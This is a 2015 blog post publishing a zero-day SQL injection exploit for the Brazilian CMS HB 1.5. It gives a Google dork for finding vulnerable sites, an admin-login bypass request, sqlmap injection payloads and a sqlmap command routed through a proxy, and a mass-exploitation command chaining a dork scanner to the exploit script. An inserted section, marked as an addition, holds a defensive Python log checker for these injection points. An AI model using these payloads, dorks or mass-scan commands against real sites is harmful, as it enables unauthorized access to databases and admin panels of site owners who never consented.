
Sunday, May 17, 2015

Exploit 0day CMS HB 1.5


0day - PHP exploit for SQL INJECTION via (GET/POST) in the Brazilian CMS HB, made by the company "Agência HB Web e Cia".



[+] Discoverer Author: M3t4tr0n
[+] FACEBOOK: https://www.facebook.com/M3T4TR0N
[+] EMAIL: [email protected]
[*] Thanks M3t4tr0n

# SCRIPT by: [ I N U R L-B R A S I L ] - [ By GoogleINURL ]
# EXPLOIT NAME: XPL 0day CMS HB 1.5 / INURL BRASIL
# AUTHOR: Cleiton Pinheiro / Nick: googleINURL
# Email: [email protected]
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# Pastebin http://pastebin.com/u/Googleinurl
# GIT: https://github.com/googleinurl
# PSS: http://packetstormsecurity.com/user/googleinurl
# EA:http://exploit4arab.net/author/248/Cleiton_Pinheiro
# YOUTUBE: http://youtube.com/c/INURLBrasil
# PLUS: http://google.com/+INURLBrasil

Neither war between hackers, nor peace for the system.
------------------------------------------------------------------------------

[ + ] FAILURE REPORTED:
15/May/2015

[ + ] Type:
ADMINISTRATIVE ACCESS PANEL

[ + ] Vendor:
http://www.hbwebecia.com.br/

[ + ] Version: 
HB 1.5

[ + ] Google Dork:
inurl:"base.php?pagina"

[ + ] FILE VULN:
/admin/logar.php

[ + ] POC:
(POST) http://{YOU_URL}/admin/logar.php?login='=' 'or'&senha='=' 'or'&Submit3=Entrar

[ + ] FILE VULN:
/base.php

[ + ] POC:
(GET) http://{YOU_URL}/base.php?pagina=noticia&id=1 + (SQLI)

[ + ] Exploitation SQLMAP output:
# Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pagina=noticia&id=114' AND 1866=1866 AND 'qvCe'='qvCe

# Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: pagina=noticia&id=114' AND (SELECT * FROM (SELECT(SLEEP(5)))MPQc) AND 'MJVC'='MJVC

# Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: pagina=noticia&id=114' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a786b71,0x664a78565a7276576e76,0x71787a7871),NULL,NULL--
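
Added example, not part of the original advisory or of the exploit script: a log check a site operator could run to spot requests matching the two injection points reported above (a non-numeric id on /base.php, quote characters in login/senha on /admin/logar.php). The log lines are constructed samples in Apache combined format, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (Apache combined format, documentation IP ranges).
SAMPLE_LOG = [
    '203.0.113.7 - - [17/May/2015:10:00:01 -0300] "GET /base.php?pagina=noticia&id=114 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [17/May/2015:10:00:05 -0300] "GET /base.php?pagina=noticia'
    '&id=114%27%20AND%201866=1866%20AND%20%27qvCe%27=%27qvCe HTTP/1.1" 200 5120',
    '203.0.113.9 - - [17/May/2015:10:00:09 -0300] "POST /admin/logar.php'
    '?login=%27=%27%20%27or%27&senha=%27=%27%20%27or%27&Submit3=Entrar HTTP/1.1" 302 0',
    '198.51.100.4 - - [17/May/2015:10:02:00 -0300] "POST /admin/logar.php HTTP/1.1" 200 812',
]

# The quoted request line inside a combined-format log entry.
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')


def classify(target):
    """Return a finding for one request target, or None if nothing matches."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    path = parts.path.lower()
    if path.endswith("/base.php"):
        # A news id should be a plain integer; anything else is suspect.
        for value in params.get("id", []):
            if not re.fullmatch(r"[0-9]+", value):
                return "base.php: non-numeric id"
    if path.endswith("/admin/logar.php"):
        # Credentials in the query string that carry quote characters.
        for name in ("login", "senha"):
            if any("'" in v or '"' in v for v in params.get(name, [])):
                return "logar.php: quote in " + name
    return None


def scan(lines):
    """Return (line number, client address, finding) for each suspicious entry."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        finding = classify(match.group("target")) if match else None
        if finding:
            findings.append((number, line.split()[0], finding))
    return findings
```

Credentials sent in a POST body do not appear in an access log, so this check only sees the query-string form used in the POC.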

[ + ] USE SQLMAP:
./sqlmap.py -u 'http://{YOU_URL}/base.php?pagina=noticia&id=1'
--dbs --random-agent --level 3 --risk 2 --proxy 'http://localhost:8118'
--dbms='MySQL' --threads 3 --time-sec 10 --identify-waf --text-only 
--flush-session --batch

[ + ] EXECUTE: 
php xpl.php -t http://target.us

[ + ] FILE_OUTPUT :
HB.txt


[ + ] Exploit: 
http://www.exploit4arab.net/exploits/1505 / http://pastebin.com/AY6sMthP

[ + ] EXPLOIT MASS USE SCANNER INURLBR:
php inurlbr.php --dork 'inurl:base.php?pagina" ext:php' -s output.txt --command-all 'php xpl.php -t _TARGET_'


More details about inurlbr scanner: https://github.com/googleinurl/SCANNER-INURLBR